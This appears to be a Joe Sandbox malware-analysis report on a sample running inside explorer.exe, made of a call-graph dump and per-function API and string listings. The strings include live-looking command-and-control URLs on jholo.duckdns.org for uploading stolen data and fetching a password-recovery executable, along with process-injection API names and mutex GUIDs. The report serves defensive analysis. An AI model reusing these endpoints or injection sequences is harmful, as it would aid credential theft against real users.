18374 11a7e10 5 API calls 18373->18374 18375 1197fd5 CoInitializeEx 18374->18375 18376 1198018 CoInitializeSecurity 18375->18376 18377 1198011 LocalFree 18375->18377 18378 119806b CoCreateInstance 18376->18378 18379 1198066 CoUninitialize 18376->18379 18377->18300 18378->18379 18381 11980aa 18378->18381 18379->18377 18610 11a3320 VariantInit 18381->18610 18383 11980b7 18611 11a3320 VariantInit 18383->18611 18385 1198130 18612 11a3320 VariantInit 18385->18612 18387 11981a9 18613 11a3320 VariantInit 18387->18613 18389 1198222 18614 11a33a0 VariantClear 18389->18614 18391 11982dd 18615 11a33a0 VariantClear 18391->18615 18393 11982eb 18616 11a33a0 VariantClear 18393->18616 18395 11982f9 18617 11a33a0 VariantClear 18395->18617 18397 1198307 18398 1198311 CoUninitialize 18397->18398 18618 11a3040 18397->18618 18398->18377 18401 119832a 18623 
11a30d0 18401->18623 18404 11983a3 18405 11a3040 74 API calls 18404->18405 18406 11983b8 18405->18406 18407 11a30d0 SysFreeString 18406->18407 18408 1198417 18407->18408 18409 119845b CoUninitialize 18408->18409 18413 119847e 18408->18413 18409->18377 18411 11984ad CoUninitialize 18411->18377 18413->18411 18414 11a3040 74 API calls 18413->18414 18415 1198574 18414->18415 18416 11a30d0 SysFreeString 18415->18416 18417 11985d3 18416->18417 18417->18411 18418 11986e9 CoCreateGuid 18417->18418 18419 1198728 StringFromGUID2 18418->18419 18420 1198741 18418->18420 18419->18420 18421 11a3040 74 API calls 18420->18421 18422 1198756 18421->18422 18423 11a30d0 SysFreeString 18422->18423 18424 11987b8 18423->18424 18424->18411 18425 11b84a8 89 API calls 18424->18425 18426 11987e8 18425->18426 18426->18411 18427 11a3040 74 API calls 18426->18427 18428 1198878 18427->18428 18429 11a30d0 SysFreeString 18428->18429 18430 11988dd 18429->18430 18430->18411 18626 11a3340 SysAllocString 18430->18626 18432 1198b56 18628 11a3320 VariantInit 18432->18628 18434 1198bcf 18435 11a3340 SysAllocString 18434->18435 18436 1198c50 18435->18436 18437 11a3040 74 API calls 18436->18437 18438 1198cd1 18437->18438 18439 11a30d0 SysFreeString 18438->18439 18440 1198d7d 18439->18440 18629 11a33a0 VariantClear 18440->18629 18442 1198d8b 18630 11a33a0 VariantClear 18442->18630 18444 1198d99 18631 11a33a0 VariantClear 18444->18631 18446 1198da7 18446->18411 18447 1198db6 CoUninitialize 18446->18447 18447->18377 18450 119f510 96 API calls 18449->18450 18451 119f215 18450->18451 18452 119f35f 18451->18452 18453 119f226 LocalAlloc 18451->18453 18452->18301 18454 119f354 LocalFree 18453->18454 18455 119f247 wnsprintfW 18453->18455 18454->18452 18456 119f288 RegOpenKeyW 18455->18456 18457 119f2e4 18455->18457 18456->18457 18458 119f2a5 RegSetValueExW RegCloseKey 18456->18458 18459 119f349 LocalFree 18457->18459 18460 119f2ed RegOpenKeyW 18457->18460 18458->18457 18459->18454 18460->18459 18461 119f30a 
RegSetValueExW RegCloseKey 18460->18461 18461->18459 18463 119eea8 SHGetKnownFolderPath 18462->18463 18466 119f1e1 18462->18466 18464 119eec7 18463->18464 18465 119f1d6 LocalFree 18463->18465 18467 11b84a8 89 API calls 18464->18467 18465->18466 18466->18305 18468 119eeee 18467->18468 18469 119f510 96 API calls 18468->18469 18470 119eeff 18469->18470 18471 119f1cb CoTaskMemFree 18470->18471 18472 119ef10 LocalAlloc 18470->18472 18471->18465 18473 119ef31 18472->18473 18474 119f1c0 LocalFree 18472->18474 18726 11b9430 18473->18726 18474->18471 18477 119f1b5 LocalFree 18477->18474 18478 119ef87 LocalAlloc 18479 119efa8 18478->18479 18480 119f1aa CoTaskMemFree 18478->18480 18481 11b84a8 89 API calls 18479->18481 18480->18477 18482 119efcf CreateDirectoryW 18481->18482 18483 119efed GetLastError 18482->18483 18484 119effe LocalAlloc 18482->18484 18483->18484 18485 119f19f LocalFree 18483->18485 18484->18485 18486 119f025 18484->18486 18485->18480 18487 11b84a8 89 API calls 18486->18487 18488 119f05b CreateFileW 18487->18488 18489 119f191 LocalFree 18488->18489 18490 119f0b0 WriteFile 18488->18490 18489->18485 18491 119f178 18490->18491 18492 119f0f5 CloseHandle 18490->18492 18491->18489 18493 119f183 CloseHandle 18491->18493 18737 11ae650 CoInitialize 18492->18737 18493->18489 18496 119f12c 6 API calls 18496->18466 18498 11ac1dd 18497->18498 18498->18308 18500 119f7b9 LocalAlloc 18499->18500 18503 119f835 18499->18503 18501 119f82a CoTaskMemFree 18500->18501 18502 119f7d6 wnsprintfW 18500->18502 18501->18503 18502->18501 18504 119f806 lstrlenW CoTaskMemFree 18502->18504 18503->18332 18505 11a5aa0 18503->18505 18504->18503 18506 119f790 6 API calls 18505->18506 18507 11a5ac3 18506->18507 18508 11a6513 18507->18508 18509 11a5ad4 LocalAlloc 18507->18509 18508->18337 18508->18338 18510 11a6508 LocalFree 18509->18510 18511 11a5af5 LocalAlloc 18509->18511 18510->18508 18512 11a64fd LocalFree 18511->18512 18513 11a5b16 18511->18513 18512->18510 18514 11a5b68 18513->18514 18515 
11a5b1d wnsprintfW wnsprintfW 18513->18515 18517 11a5bba 18514->18517 18518 11a5b6f wnsprintfW wnsprintfW 18514->18518 18516 11a64d1 LocalFree 18515->18516 18516->18508 18519 11a5c0c 18517->18519 18520 11a5bc1 wnsprintfW wnsprintfW 18517->18520 18518->18516 18521 11a5c5e 18519->18521 18522 11a5c13 wnsprintfW wnsprintfW 18519->18522 18520->18516 18523 11a5cb0 18521->18523 18524 11a5c65 wnsprintfW wnsprintfW 18521->18524 18522->18516 18525 11a5d02 18523->18525 18526 11a5cb7 wnsprintfW wnsprintfW 18523->18526 18524->18516 18527 11a5d09 wnsprintfW wnsprintfW 18525->18527 18528 11a5d54 18525->18528 18526->18516 18527->18516 18529 11a5d5b wnsprintfW wnsprintfW 18528->18529 18530 11a5da6 18528->18530 18529->18516 18531 11a5df8 18530->18531 18532 11a5dad wnsprintfW wnsprintfW 18530->18532 18533 11a5e4a 18531->18533 18534 11a5dff wnsprintfW wnsprintfW 18531->18534 18532->18516 18535 11a5e9c 18533->18535 18536 11a5e51 wnsprintfW wnsprintfW 18533->18536 18534->18516 18537 11a5eee 18535->18537 18538 11a5ea3 wnsprintfW wnsprintfW 18535->18538 18536->18516 18539 11a5f40 18537->18539 18540 11a5ef5 wnsprintfW wnsprintfW 18537->18540 18538->18516 18541 11a5f92 18539->18541 18542 11a5f47 wnsprintfW wnsprintfW 18539->18542 18540->18516 18543 11a5f99 wnsprintfW wnsprintfW 18541->18543 18544 11a5fe4 18541->18544 18542->18516 18543->18516 18545 11a5feb wnsprintfW wnsprintfW 18544->18545 18546 11a6036 18544->18546 18545->18516 18547 11a6088 18546->18547 18548 11a603d wnsprintfW wnsprintfW 18546->18548 18549 11a60da 18547->18549 18550 11a608f wnsprintfW wnsprintfW 18547->18550 18548->18516 18551 11a612c 18549->18551 18552 11a60e1 wnsprintfW wnsprintfW 18549->18552 18550->18516 18553 11a617e 18551->18553 18554 11a6133 wnsprintfW wnsprintfW 18551->18554 18552->18516 18555 11a61d0 18553->18555 18556 11a6185 wnsprintfW wnsprintfW 18553->18556 18554->18516 18557 11a6222 18555->18557 18558 11a61d7 wnsprintfW wnsprintfW 18555->18558 18556->18516 18559 11a6229 wnsprintfW wnsprintfW 18557->18559 
18560 11a6274 18557->18560 18558->18516 18559->18516 18561 11a627b wnsprintfW wnsprintfW 18560->18561 18562 11a62c6 18560->18562 18561->18516 18563 11a6318 18562->18563 18564 11a62cd wnsprintfW wnsprintfW 18562->18564 18565 11a636a 18563->18565 18566 11a631f wnsprintfW wnsprintfW 18563->18566 18564->18516 18567 11a63bc 18565->18567 18568 11a6371 wnsprintfW wnsprintfW 18565->18568 18566->18516 18569 11a640e 18567->18569 18570 11a63c3 wnsprintfW wnsprintfW 18567->18570 18568->18516 18571 11a645d 18569->18571 18572 11a6415 wnsprintfW wnsprintfW 18569->18572 18570->18516 18573 11a64ac LocalFree LocalFree LocalFree 18571->18573 18574 11a6464 wnsprintfW wnsprintfW 18571->18574 18572->18516 18573->18508 18574->18516 18586 11b0ac0 LocalAlloc 18575->18586 18577 11b1228 18577->18354 18578 11b1215 VirtualFree 18578->18577 18579 11b11bb 18594 11b0670 LocalAlloc 18579->18594 18580 11b101a LoadLibraryA 18581 11b0ea9 18580->18581 18583 11b0eb6 18580->18583 18581->18579 18581->18580 18581->18583 18584 11b10ba GetProcAddress 18581->18584 18585 11b1117 GetProcAddress 18581->18585 18583->18577 18583->18578 18584->18581 18584->18583 18585->18581 18585->18583 18587 11b0b45 18586->18587 18588 11b0b4c und_memcpy 18586->18588 18587->18581 18589 11b0b8a VirtualAlloc 18588->18589 18590 11b0bc2 LocalFree 18589->18590 18591 11b0bd7 und_memcpy 18589->18591 18590->18587 18592 11b0e05 LocalFree 18591->18592 18593 11b0cf3 und_memcpy 18591->18593 18592->18587 18593->18581 18595 11b06d8 18594->18595 18599 11b06df und_memcpy 18594->18599 18595->18583 18596 11b0a78 LocalFree 18596->18595 18597 11b09bf 18596->18597 18597->18595 18598 11b0a98 LocalFree 18597->18598 18598->18595 18599->18596 18600 11b098c VirtualProtect 18599->18600 18600->18597 18601 11b09c9 18600->18601 18601->18596 18603 11a7f38 18602->18603 18604 11a7e3d 18602->18604 18607 11a7fc0 LocalAlloc 18603->18607 18609 11a7e73 _snprintf wmemmove 18603->18609 18605 11a7eb9 lstrlenW LocalAlloc 18604->18605 18606 11a7e47 lstrlenW 18604->18606 
18608 11a7f0e lstrcpyW 18605->18608 18605->18609 18606->18609 18607->18609 18608->18609 18609->18373 18610->18383 18611->18385 18612->18387 18613->18389 18614->18391 18615->18393 18616->18395 18617->18397 18632 11a3290 18618->18632 18622 11a307d 18622->18401 18709 11a3130 18623->18709 18627 11a337b 18626->18627 18627->18432 18628->18434 18629->18442 18630->18444 18631->18446 18637 11b9030 18632->18637 18635 11a3170 SysAllocString 18636 11a31b5 18635->18636 18636->18622 18639 11b903b 18637->18639 18638 11bc7a8 malloc 62 API calls 18638->18639 18639->18638 18640 11a3061 18639->18640 18641 11bc868 _callnewh DecodePointer 18639->18641 18644 11b905a _DebugMallocator 18639->18644 18640->18622 18640->18635 18641->18639 18642 11b90ab 18654 11b92a4 18642->18654 18644->18642 18651 11bc790 18644->18651 18648 11b90d2 18660 11bc89c 18648->18660 18669 11bc684 18651->18669 18683 11b9214 18654->18683 18657 11b8f9c 18658 11b8fca wmemmove 18657->18658 18659 11b9009 RaiseException 18658->18659 18659->18648 18661 11c0c94 _lock 62 API calls 18660->18661 18662 11bc8af 18661->18662 18665 11bc8e3 18662->18665 18667 11bc600 free 62 API calls 18662->18667 18668 11bc8f3 18662->18668 18666 11bc600 free 62 API calls 18665->18666 18666->18668 18667->18665 18708 11c0b94 LeaveCriticalSection 18668->18708 18682 11be624 18669->18682 18684 11b90bc 18683->18684 18685 11b9229 18683->18685 18684->18657 18689 11b91bc 18685->18689 18690 11b91cb 18689->18690 18691 11b91d4 18689->18691 18692 11bc600 free 62 API calls 18690->18692 18691->18684 18693 11b9160 18691->18693 18692->18691 18694 11b9165 std::exception::operator= 18693->18694 18698 11b91a6 18693->18698 18695 11bc7a8 malloc 62 API calls 18694->18695 18696 11b918e 18695->18696 18696->18698 18699 11bc9d0 18696->18699 18698->18684 18700 11bc9db 18699->18700 18701 11bc9e5 18699->18701 18700->18701 18704 11bca01 18700->18704 18702 11baa70 _errno 62 API calls 18701->18702 18703 11bc9ed 18702->18703 18705 11baa08 _invalid_parameter_noinfo 17 API calls 
18703->18705 18706 11bc9f9 18704->18706 18707 11baa70 _errno 62 API calls 18704->18707 18705->18706 18706->18698 18707->18703 18710 11a3144 18709->18710 18712 1198394 18709->18712 18713 11a31e0 18710->18713 18712->18398 18712->18404 18714 11a320a 18713->18714 18716 11a3235 18713->18716 18714->18716 18717 11a3250 18714->18717 18716->18712 18720 11a32b0 18717->18720 18719 11a3267 18719->18716 18723 11a32d0 18720->18723 18722 11a32c3 18722->18719 18724 11a32f2 18723->18724 18725 11a32e4 SysFreeString 18723->18725 18724->18722 18725->18724 18728 11b9462 _snprintf 18726->18728 18727 11b9467 18730 11baa70 _errno 62 API calls 18727->18730 18728->18727 18729 11b9486 18728->18729 18742 11bcc2c 18729->18742 18732 11b946c 18730->18732 18734 11baa08 _invalid_parameter_noinfo 17 API calls 18732->18734 18735 119ef64 SHGetKnownFolderPath 18734->18735 18735->18477 18735->18478 18736 11b9a64 write_char 82 API calls 18736->18735 18738 11ae673 CoCreateInstance 18737->18738 18739 119f128 18737->18739 18740 11ae73a CoUninitialize 18738->18740 18741 11ae6a8 18738->18741 18739->18491 18739->18496 18740->18739 18741->18740 18743 11b951c _cftof_l 62 API calls 18742->18743 18744 11bcc97 18743->18744 18745 11baa70 _errno 62 API calls 18744->18745 18746 11bcc9c 18745->18746 18747 11bcca8 18746->18747 18748 11bccd4 18746->18748 18749 11baa70 _errno 62 API calls 18747->18749 18752 11c046c _fileno 62 API calls 18748->18752 18773 11bccf1 std::exception::operator= _snprintf 18748->18773 18751 11bccad 18749->18751 18750 11bcd5f 18754 11baa70 _errno 62 API calls 18750->18754 18753 11baa08 _invalid_parameter_noinfo 17 API calls 18751->18753 18752->18773 18758 11bccb8 18753->18758 18755 11bcd64 18754->18755 18756 11baa08 _invalid_parameter_noinfo 17 API calls 18755->18756 18756->18758 18757 11bc5e0 _cftoe_l 8 API calls 18759 11b94b6 18757->18759 18758->18757 18759->18735 18759->18736 18760 11c09f0 _snprintf 62 API calls 18760->18773 18761 11bcaf8 82 API calls write_char 18761->18773 18762 11baa70 

                          Control-flow Graph: function 11a0740
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Section$View$Close$lstrcpy$Unmap$AddressHandleProcProcess$Create$Current$Terminate$EventLibraryLoadModuleObjectSingleThreadUserWait
                          • String ID: @$@$CloseHandle$GetProcAddress$KERNEL32.DLL$KERNEL32.DLL$LoadLibraryA$LoadLibraryW$LocalAlloc$LocalFree$MessageBoxW$NTDLL.DLL$NtClose$NtCreateSection$NtMapViewOfSection$NtUnmapViewOfSection$RtlCreateUserThread$Sleep$USER32.DLL$VirtualAlloc$VirtualFree$VirtualProtect$h
                          • API String ID: 1065732154-2887914861
                          • Opcode ID: d22ddcdab2ec187a5051f8031a5281a0f50d3b2f8a6a42ef61a701425755e042
                          • Instruction ID: 57709f440208d6c4048e9c81c43c9bc77cdd70afe6bcee287b52ecd5518e5b1a
                          • Opcode Fuzzy Hash: d22ddcdab2ec187a5051f8031a5281a0f50d3b2f8a6a42ef61a701425755e042
                          • Instruction Fuzzy Hash: 95529E76208BC486E775DB15F4983DAB7A0F7C8798F50012ADA8A47B68DF7DC189CB40

                          Control-flow Graph: function 11b5e50
                          APIs
                          Strings
                          • {B4EFAA26-FFCE-43F3-A2CA-51585A1D8497}, xrefs: 011B5ED7
                          • {29C72B9F-C97F-4A3E-B2AD-47E00C9D4930}, xrefs: 011B5E5C
                          • {CCDA2DA7-D4F8-4F83-BFB6-45A8FDBB92EB}, xrefs: 011B5E93
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$EventMutexOpen$CreateObjectReleaseSingleWait
                          • String ID: {29C72B9F-C97F-4A3E-B2AD-47E00C9D4930}${B4EFAA26-FFCE-43F3-A2CA-51585A1D8497}${CCDA2DA7-D4F8-4F83-BFB6-45A8FDBB92EB}
                          • API String ID: 385723476-3335872644
                          • Opcode ID: a2d0ff3b073e106ed3e089b8a847fad09ce9971624778b037ba3c996cbbe071a
                          • Instruction ID: 2c3827eaaab6f433bba0666915ffa6cd0251f5869941a631bfbbd38712888a6a
                          • Opcode Fuzzy Hash: a2d0ff3b073e106ed3e089b8a847fad09ce9971624778b037ba3c996cbbe071a
                          • Instruction Fuzzy Hash: 3AF11C31508A40C6F76CAF55F8987DAB7A1F7D4759F105129E78A82AB8CF7CC48ACB01

                          Control-flow Graph (entry block 11953b0; graph image not reproduced)
                          APIs
                          Strings
                          • Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0, xrefs: 01195443, 011956FE
                          • {D83724BA-04CE-4C5A-92C0-4EFDCB8527B7}, xrefs: 01195426, 01195890
                          • http://jholo.duckdns.org:8181/PASSWORDRECOVERY64EXE.EXE, xrefs: 01195723
                          • http://jholo.duckdns.org:8181/upload.php, xrefs: 0119547D
                          • {77502BD7-F094-4214-B203-3420A1B5DA5A}, xrefs: 011953E8
                          • {2046C745-B848-47EE-8068-B039EAC15A1C}, xrefs: 01195863
                          • %s %s, xrefs: 01195877
                          • {80B01CD6-9400-4D04-9C3F-8E33F208D7F0}, xrefs: 0119549A
                          • {CCDA2DA7-D4F8-4F83-BFB6-45A8FDBB92EB}, xrefs: 01195409
                          • HWID_%s, xrefs: 0119564F
                          • 8DWH9, xrefs: 01195460
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Local$BinaryCloseCryptFreeHandleString$Alloc
                          • String ID: %s %s$8DWH9$HWID_%s$Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0$http://jholo.duckdns.org:8181/PASSWORDRECOVERY64EXE.EXE$http://jholo.duckdns.org:8181/upload.php${2046C745-B848-47EE-8068-B039EAC15A1C}${77502BD7-F094-4214-B203-3420A1B5DA5A}${80B01CD6-9400-4D04-9C3F-8E33F208D7F0}${CCDA2DA7-D4F8-4F83-BFB6-45A8FDBB92EB}${D83724BA-04CE-4C5A-92C0-4EFDCB8527B7}
                          • API String ID: 1616647813-2197411971
                          • Opcode ID: ed85ddc92422963fe84181da24f9d54ef7f1b7cb9a7efb9a38633701095274f8
                          • Instruction ID: 2afd4a396b246c48ce20dcbf3cacfaa361779d8dc76cedb8e2f1328b19006188
                          • Opcode Fuzzy Hash: ed85ddc92422963fe84181da24f9d54ef7f1b7cb9a7efb9a38633701095274f8
                          • Instruction Fuzzy Hash: A4020B35218B8486EB6DEB64F8943DA77A2F788758F40413AEA4D437A4DF7CC14ACB40

                          Control-flow Graph (entry block 11ad600; graph image not reproduced)
                          APIs
                          • OpenMutexW.KERNEL32 ref: 011AD615
                          • LoadLibraryW.KERNEL32 ref: 011AD629
                          • LocalAlloc.KERNEL32 ref: 011AD647
                          • GetModuleFileNameW.KERNEL32 ref: 011AD671
                          • SetEvent.KERNEL32 ref: 011ADA70
                          • WaitForSingleObject.KERNEL32 ref: 011ADA82
                          • CloseHandle.KERNEL32 ref: 011ADA8F
                          • CloseHandle.KERNEL32 ref: 011ADAA6
                          • ExitProcess.KERNEL32 ref: 011ADACB
                            • Part of subcall function 011B2610: SetEvent.KERNEL32 ref: 011B262F
                            • Part of subcall function 011B2610: WaitForSingleObject.KERNEL32 ref: 011B264B
                            • Part of subcall function 011B2610: CloseHandle.KERNEL32 ref: 011B2662
                            • Part of subcall function 011B2610: SetEvent.KERNEL32 ref: 011B2679
                            • Part of subcall function 011B2610: WaitForSingleObject.KERNEL32 ref: 011B2695
                            • Part of subcall function 011B2610: CloseHandle.KERNEL32 ref: 011B26AC
                            • Part of subcall function 011B2610: CloseHandle.KERNEL32 ref: 011B26C3
                            • Part of subcall function 011B2610: SetEvent.KERNEL32 ref: 011B26DA
                            • Part of subcall function 011B2610: WaitForSingleObject.KERNEL32 ref: 011B26F6
                            • Part of subcall function 011B2610: CloseHandle.KERNEL32 ref: 011B270D
                            • Part of subcall function 011B2610: SetEvent.KERNEL32 ref: 011B2724
                            • Part of subcall function 011B2610: WaitForSingleObject.KERNEL32 ref: 011B2740
                            • Part of subcall function 011B2610: CloseHandle.KERNEL32 ref: 011B2757
                            • Part of subcall function 011B2610: CloseHandle.KERNEL32 ref: 011B276E
                          • CloseHandle.KERNEL32 ref: 011ADAE7
                          • CloseHandle.KERNEL32 ref: 011ADAFA
                          • CloseHandle.KERNEL32 ref: 011ADB25
                          • LocalFree.KERNEL32 ref: 011ADB38
                          • ExitProcess.KERNEL32 ref: 011ADB49
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$EventObjectSingleWait$ExitLocalProcess$AllocFileFreeLibraryLoadModuleMutexNameOpen
                          • String ID: KERNEL32.DLL${1C8F1E61-D31A-4DE2-A46A-E1D82FC75222}${4002ADAA-2323-44A5-9F39-80B79D7023EC}${45B611DD-86ED-4560-AAC7-993511C63D52}${BBD69D41-7ECF-4B3B-8592-7E70DE12B303}${CCDA2DA7-D4F8-4F83-BFB6-45A8FDBB92EB}
                          • API String ID: 2953619224-2001950224
                          • Opcode ID: 7d4233aa22a0ef6a752a48a5c6b58013a9f72c86b8a6f913a1f9c80323a7af34
                          • Instruction ID: 7b7a688c6ef4ad0c43a4d31c1bb455fb1ee32b6a0fbae037610e8e6e5ca32020
                          • Opcode Fuzzy Hash: 7d4233aa22a0ef6a752a48a5c6b58013a9f72c86b8a6f913a1f9c80323a7af34
                          • Instruction Fuzzy Hash: 80D14F39108F84C6EF6CABA4F8543DA7BA1F780758F804129D79A46EA4DF7CC089CB41

                          Control-flow Graph (entry block 11a9d20; graph image not reproduced)
                          APIs
                          • std::rethrow_exception.LIBCMTD ref: 011A9DE0
                          • std::rethrow_exception.LIBCMTD ref: 011A9E64
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::rethrow_exception
                          • String ID: */*$GET$h
                          • API String ID: 1317400359-3109941101
                          • Opcode ID: f129953d59edf0b601b504c3e7c4680672db90959bf7e53f46ffae57e779adc8
                          • Instruction ID: 6a0a7e852ded5dbfde3bfa200ce1c17344cde8507c1cba67420deb8a3b348aa9
                          • Opcode Fuzzy Hash: f129953d59edf0b601b504c3e7c4680672db90959bf7e53f46ffae57e779adc8
                          • Instruction Fuzzy Hash: CF02F376218AC486E779DB15F4943DEBBA0FB88784F904126DB8983B58DF7CC489CB40

                          Control-flow Graph

                          APIs
                            • Part of subcall function 011A8830: LoadLibraryW.KERNEL32 ref: 011A8842
                          • ExitProcess.KERNEL32 ref: 0119104B
                          • GetModuleFileNameW.KERNEL32 ref: 01191076
                          • ExitProcess.KERNEL32 ref: 01191082
                          Strings
                          • {56B2BCE6-A24C-48AB-82DC-EE1FC9C9389D}, xrefs: 011910AF
                          • {29C72B9F-C97F-4A3E-B2AD-47E00C9D4930}, xrefs: 011910FB
                          • {80130DAC-3FD0-43E8-A3CA-91C0865C2735}, xrefs: 01191134
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess$FileLibraryLoadModuleName
                          • String ID: {29C72B9F-C97F-4A3E-B2AD-47E00C9D4930}${56B2BCE6-A24C-48AB-82DC-EE1FC9C9389D}${80130DAC-3FD0-43E8-A3CA-91C0865C2735}
                          • API String ID: 2450766465-982829053
                          • Opcode ID: b9869db3e5f7c4508dfd2fe2599929d060a4f2c79dbf368f78a08d4dec883f46
                          • Instruction ID: ff690048291165ff3197f57ef73099774f6a9feffe4e6d2b5aaf502013fd1f73
                          • Opcode Fuzzy Hash: b9869db3e5f7c4508dfd2fe2599929d060a4f2c79dbf368f78a08d4dec883f46
                          • Instruction Fuzzy Hash: D9414970224B8592EB2CEF70F8593DA73A1FB84758F80453DD69A86664DF3DC19ACB40

                          Control-flow Graph (entry block 11b2340; graph image not reproduced)
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Create$Thread$EventFreeLocal$CleanupCloseHandleStartuplstrlen
                          • String ID: "%s%s"$Spotify.exe${669627E2-6B39-4990-B906-8786734FF1DD}
                          • API String ID: 168511978-1023982500
                          • Opcode ID: 9aebad6ca0014e8195b976bf8917804cce9ca2f0a7ce69afa20890b83307dac2
                          • Instruction ID: 334f95d01d7590dfd38f54559a845cf472084a158bbc993863a70ced0cb44453
                          • Opcode Fuzzy Hash: 9aebad6ca0014e8195b976bf8917804cce9ca2f0a7ce69afa20890b83307dac2
                          • Instruction Fuzzy Hash: 26616C71204B49C2FB2CEF64F9987DA77A5F798748F40412ADA4A87A64CF7CC189CB41

                          Control-flow Graph (entry block 11adc00; graph image not reproduced)
                          APIs
                          Strings
                          • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 011ADC40
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Crypt$Hash$Context$DataRelease$AcquireCreateDestroyObjectSingleWait
                          • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                          • API String ID: 1452691613-63410773
                          • Opcode ID: f6a205860e882ed8ebe0ba0d3915f1ee79818a5dd84249d0a98f84a41e6c144c
                          • Instruction ID: dac46f1a2099aa3bb034c346dede1b80793b113227aab751646fe88baf021091
                          • Opcode Fuzzy Hash: f6a205860e882ed8ebe0ba0d3915f1ee79818a5dd84249d0a98f84a41e6c144c
                          • Instruction Fuzzy Hash: 07510D36218A8086E758DF59F45479EBBA1F7C4784F505029F78A82EA8CF7DC445CF40
                          APIs
                          • LocalFree.KERNEL32 ref: 011B24B6
                          • CreateEventW.KERNEL32 ref: 011B2506
                          • CreateThread.KERNEL32 ref: 011B253C
                          • CloseHandle.KERNEL32 ref: 011B255C
                          • WSAStartup.WS2_32 ref: 011B256B
                          • CreateThread.KERNEL32 ref: 011B259D
                          • CreateThread.KERNEL32 ref: 011B25C9
                            • Part of subcall function 011ADEF0: AllocateAndInitializeSid.ADVAPI32 ref: 011ADF62
                            • Part of subcall function 011ADEF0: CheckTokenMembership.ADVAPI32 ref: 011ADF7F
                            • Part of subcall function 011ADEF0: FreeSid.ADVAPI32 ref: 011ADF96
                          • WSACleanup.WS2_32 ref: 011B25E7
                            • Part of subcall function 0119F510: SHGetKnownFolderPath.SHELL32 ref: 0119F587
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F59A
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F5B5
                            • Part of subcall function 0119F510: LocalAlloc.KERNEL32 ref: 0119F5DC
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F620
                            • Part of subcall function 0119F510: CoTaskMemFree.COMBASE ref: 0119F635
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
